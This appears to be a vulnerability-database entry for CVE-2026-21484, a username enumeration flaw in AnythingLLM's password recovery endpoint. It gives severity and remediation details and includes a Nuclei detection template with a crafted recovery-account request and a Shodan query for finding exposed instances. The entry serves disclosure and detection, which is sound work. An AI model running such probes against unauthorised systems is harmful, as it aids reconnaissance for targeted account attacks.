
AnythingLLM - Username Enumeration via Password Recovery

CVE-2026-21484
Early Release

Description

AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. Prior to commit e287fab56089cf8fcea9ba579a3ecdeca0daa313, the password recovery endpoint returns different error messages depending on whether a username exists, thereby enabling username enumeration. Commit e287fab56089cf8fcea9ba579a3ecdeca0daa313 fixes this issue.

Severity

Medium

CVSS Score

5.3

Exploit Probability

1%

Affected Product

anything-llm

Published Date

April 15, 2026

Template Author

dhiyaneshdk

CVE-2026-21484.yaml
id: CVE-2026-21484

info:
  name: AnythingLLM - Username Enumeration via Password Recovery
  author: DhiyaneshDk
  severity: medium
  description: |
    AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. Prior to commit e287fab56089cf8fcea9ba579a3ecdeca0daa313, the password recovery endpoint returns different error messages depending on whether a username exists, so enabling username enumeration. Commit e287fab56089cf8fcea9ba579a3ecdeca0daa313 fixes this issue.
  impact: |
    Attackers can enumerate valid usernames, aiding further targeted attacks or social engineering.
  remediation: Update to the version including commit e287fab56089cf8fcea9ba579a3ecdeca0daa313 or later.
  reference:
    - https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-47vr-w3vm-69ch
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-21484
    epss-score: 0.01216
    epss-percentile: 0.79046
    cwe-id: CWE-203,CWE-204
  metadata:
    verified: true
    max-request: 2
    vendor: mintplex-labs
    product: anything-llm
    shodan-query: http.favicon.hash:-1279687529
  tags: cve,cve2026,anythingllm,user-enum

variables:
  rc1: "{{rand_text_alphanumeric(8)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(12)}}"
  rc2: "{{rand_text_alphanumeric(8)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(12)}}"
  rc3: "{{rand_text_alphanumeric(8)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(12)}}"
  rc4: "{{rand_text_alphanumeric(8)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(12)}}"

http:
  - raw:
      - |
        POST /api/system/recover-account HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{randstr}}","recoveryCodes":["{{rc3}}","{{rc4}}"]}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 400'
          - 'contains_all(body, "Invalid recovery codes","success")'
        condition: and
# digest: 4a0a00473045022016a21918300eb3d1275e2e6365b4f14258ed7d2acd4ebd0b742ffd4d159e3be9022100941f3806bb49ec325d83f0be539a6c1f4e93d469c8f1ab64c76f8ea282042f93:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID: CVE-2026-21484
CWE ID: CWE-203, CWE-204

References

https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-47vr-w3vm-69ch

Remediation Steps

Update to the version including commit e287fab56089cf8fcea9ba579a3ecdeca0daa313 or later.